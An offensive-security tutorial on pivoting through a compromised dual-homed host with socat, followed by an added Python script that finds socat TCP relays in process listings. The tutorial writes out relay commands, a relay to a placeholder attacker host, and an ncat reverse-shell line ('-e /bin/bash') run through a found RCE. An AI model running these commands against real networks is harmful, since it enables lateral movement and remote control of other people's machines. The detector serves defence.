The Art of Pivoting using Socat (forward/reverse)


In this example 10.10.10.102 is our pivot. In our scenario this workstation has two network interfaces: one facing the internet (let's say 213.45.44.166, please note this is only an example!) and one on the internal network (10.10.10.102).

From our attacking machine we can't communicate directly with 10.10.10.101: it sits behind NAT. But we can reach the server sitting in the DMZ (213.45.44.166), which in turn can connect to 10.10.10.101 and the other workstations in the LAN.

So if we have a shell on our pivot workstation we have many options to attack the other computers in the LAN. One is to install all our hacking tools on 10.10.10.102 and make it our new attacking machine, but that is a bad idea and not elegant (the blue team would approve). If we have a meterpreter shell we can also use Metasploit's add route feature or its socks proxy (msf5; in msf6 it was removed), and that way we land inside the LAN.

But what if we can't use Metasploit? We can simply use this server (10.10.10.102) as a pivot and launch our attacks from our attacking machine against the other computers in the LAN (10.10.10.101 in this case) using nothing but SOCAT!

So on our pivot we run a command like this:

socat TCP4-LISTEN:8080,fork TCP4:10.10.10.101:80

The explanation of this command is really simple: every connection arriving at our pivot (in this case on its public interface) on port 8080 is redirected to 10.10.10.101 on port 80. The `fork` option makes socat handle each incoming connection in a child process, so the listener keeps accepting new clients instead of exiting after the first one.

So from our attacking machine, if we open Firefox we can browse port 80 on 10.10.10.101 through 10.10.10.102 as the pivot: http://public_ip_of_our_pivot:8080


Nice, isn't it? :-)

But what if we need to pop a reverse shell from 10.10.10.101 that goes directly to our attacking machine? In a real scenario 10.10.10.101 could be a workstation that can't communicate with the internet, maybe an internal server.

Here socat helps us again, and 10.10.10.102 is our pivot again. Let's say we found an RCE on 10.10.10.101, so we can run commands on it.

But first we need to create a socat reverse relay on our pivot:

socat tcp-l:6666 tcp:IP_ATTACKING_MACHINE:6666

Then on our attacking machine we open a listener:

ncat -nlvp 6666

And finally from 10.10.10.101 we run a reverse shell command like this:

ncat 10.10.10.102 6666 -e /bin/bash

The shell goes to 10.10.10.102, which redirects all TCP traffic on port 6666 to our attacking machine.
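From the defender's side, both relays shown above (the forward relay on port 8080 and the reverse relay on port 6666) leave the same footprint on the pivot: a socat process whose command line names a TCP listen address and a TCP connect address. The following Python script is an added example, not code from the original article: it parses a process listing (the `ps -eo pid,args` sample below is constructed) and extracts each socat TCP relay as a listen-port to target host:port mapping, so an auditor can see at a glance what a host is forwarding and where. It recognises the two spellings used in the article (`TCP4-LISTEN:8080,fork` and `tcp-l:6666`), the other TCP listen/connect keywords socat accepts, and either order of the two addresses; non-TCP addresses and everything else socat can do are deliberately ignored.

```python
"""Audit helper: spot socat TCP relays in a process listing.

Added example (not from the original article). Given the text of
`ps -eo pid,args`, parse every socat command line of the form

    socat <LISTEN-address>[,opts] <CONNECT-address>[,opts]

into a relay record (listen port -> target host:port). Only plain TCP
relays are recognised; bracketed IPv6 hosts and service names instead of
numeric ports are not handled and such lines are skipped.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional

# socat address keywords are case-insensitive; these are the TCP listen
# and connect spellings (full names and abbreviations) we recognise.
LISTEN_TYPES = {"tcp-listen", "tcp4-listen", "tcp6-listen", "tcp-l", "tcp4-l", "tcp6-l"}
CONNECT_TYPES = {"tcp", "tcp4", "tcp6"}

# Constructed sample of `ps -eo pid,args` output on a host running relays.
# 842/843 are the forked parent and one child of the same listener;
# 955 writes the two addresses in the opposite order; 960 is not a relay.
SAMPLE_PS = """\
  PID ARGS
    1 /sbin/init
  842 /usr/bin/socat TCP4-LISTEN:8080,fork TCP4:10.10.10.101:80
  843 /usr/bin/socat TCP4-LISTEN:8080,fork TCP4:10.10.10.101:80
  901 socat tcp-l:6666 tcp:192.0.2.10:6666
  955 socat -d -d TCP:10.10.10.101:22 TCP-LISTEN:2222,reuseaddr,fork
  960 socat STDIO TCP:10.10.10.1:443
 1010 bash
"""


@dataclass
class Relay:
    pid: int
    listen_port: int
    target_host: str
    target_port: int
    forks: bool  # with ,fork the relay serves many clients; without it, only one


def _split_address(addr: str):
    """'TCP4-LISTEN:8080,fork' -> ('tcp4-listen', ['8080'], {'fork'})."""
    spec, _, opts = addr.partition(",")
    parts = spec.split(":")
    kind = parts[0].lower()
    options = {o.lower() for o in opts.split(",") if o}
    return kind, parts[1:], options


def parse_socat_relay(pid: int, argv: List[str]) -> Optional[Relay]:
    """Return a Relay if argv is 'socat <listen> <connect>' over TCP, else None."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "socat":
        return None
    # Drop socat's own flags (-d, -v, ...) so only the two addresses remain.
    addrs = [a for a in argv[1:] if not a.startswith("-")]
    if len(addrs) != 2:
        return None
    kind_a, fields_a, opts_a = _split_address(addrs[0])
    kind_b, fields_b, opts_b = _split_address(addrs[1])
    # socat accepts the two addresses in either order; normalise listen-first.
    if kind_a in CONNECT_TYPES and kind_b in LISTEN_TYPES:
        kind_a, fields_a, opts_a, kind_b, fields_b, opts_b = (
            kind_b, fields_b, opts_b, kind_a, fields_a, opts_a)
    if kind_a not in LISTEN_TYPES or kind_b not in CONNECT_TYPES:
        return None
    # Listen side: one field (port). Connect side: host and port.
    if len(fields_a) != 1 or len(fields_b) != 2:
        return None
    if not (fields_a[0].isdigit() and fields_b[1].isdigit()):
        return None
    return Relay(pid, int(fields_a[0]), fields_b[0], int(fields_b[1]), "fork" in opts_a)


def find_relays(ps_output: str) -> List[Relay]:
    """Parse `ps -eo pid,args` text and return every socat TCP relay found."""
    relays = []
    for line in ps_output.splitlines()[1:]:  # skip the PID/ARGS header
        line = line.strip()
        if not line:
            continue
        pid_str, _, args = line.partition(" ")
        if not pid_str.isdigit():
            continue
        relay = parse_socat_relay(int(pid_str), shlex.split(args))
        if relay:
            relays.append(relay)
    return relays


if __name__ == "__main__":
    for r in find_relays(SAMPLE_PS):
        mode = "fork" if r.forks else "single-shot"
        print(f"pid {r.pid}: 0.0.0.0:{r.listen_port} -> {r.target_host}:{r.target_port} ({mode})")
```

On the constructed sample this reports four relays: the forked listener on 8080 twice (parent and child share one command line, which is why a forking relay shows up as one process per active client plus the listener), the single-shot relay on 6666, and the swapped-order relay on 2222. Feeding it the real `ps -eo pid,args` output of a suspected pivot host gives the same kind of inventory.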

Here's an image that explains this process (please note that the IPs differ from our scenario: I'm lazy and I don't want to edit the image. Please also note that the image shows a double pivot!)


Easy, right?

Just remember that socat is not the only option: you can also use chisel, ssh, iptables (if we're root) and all the nice things we have in Metasploit.